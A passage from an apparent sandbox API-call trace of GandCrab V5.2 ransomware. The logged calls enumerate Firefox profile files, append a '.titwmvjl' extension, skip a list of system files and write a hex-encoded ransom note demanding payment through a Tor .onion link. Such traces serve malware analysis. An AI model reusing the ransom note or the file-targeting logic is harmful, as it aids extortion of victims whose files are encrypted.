2d\x2d\x2d") returned 4273 [0082.196] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0082.197] CloseHandle (hObject=0x2d4) returned 1 [0082.197] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.197] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.198] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1b, wMilliseconds=0x203)) [0082.198] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.198] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0082.198] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0082.198] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a09d2ca4deb61a.lock") returned 108 [0082.198] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0082.200] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.200] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.200] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\") returned 84 [0082.200] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*" [0082.200] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503438 [0082.200] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.200] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.201] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.201] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.201] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.201] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0082.201] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0082.201] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a09d2ca4deb61a.lock" [0082.201] lstrlenW (lpString=".titwmvjl") returned 9 [0082.201] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a09d2ca4deb61a.lock") returned 108 [0082.201] VirtualAlloc (lpAddress=0x0, dwSize=0x118, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.201] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 117 [0082.201] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\d2ca4a09d2ca4deb61a.lock") returned 108 [0082.201] lstrlenW (lpString=".lock") returned 5 [0082.201] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.201] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0082.201] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.202] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.202] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.202] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0082.202] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0082.202] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\TITWMVJL-DECRYPT.txt" [0082.202] lstrlenW (lpString=".titwmvjl") returned 9 [0082.202] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\TITWMVJL-DECRYPT.txt") returned 104 [0082.202] VirtualAlloc (lpAddress=0x0, dwSize=0x110, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.202] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 113 [0082.202] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\TITWMVJL-DECRYPT.txt") returned 104 [0082.202] lstrlenW (lpString=".txt") returned 4 [0082.202] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.202] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0082.202] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0082.202] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.203] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\TITWMVJL-DECRYPT.txt") returned 104 [0082.203] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\TITWMVJL-DECRYPT.txt") returned 104 [0082.203] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0082.203] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0082.203] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0082.203] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0082.203] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0082.203] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0082.203] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0082.203] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0082.203] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.203] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.203] lstrcmpW (lpString1="WINNT_x86-msvc", lpString2=".") returned 1 [0082.203] lstrcmpW (lpString1="WINNT_x86-msvc", lpString2="..") returned 1 [0082.203] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\", lpString2="WINNT_x86-msvc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc" [0082.203] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\" [0082.203] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0082.203] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.203] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0082.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.204] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0082.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.204] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0082.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.204] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0082.204] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.204] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.204] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\\\TITWMVJL-DECRYPT.txt") returned 120 [0082.204] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\WINNT_x86-msvc\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp\\winnt_x86-msvc\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0082.205] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x6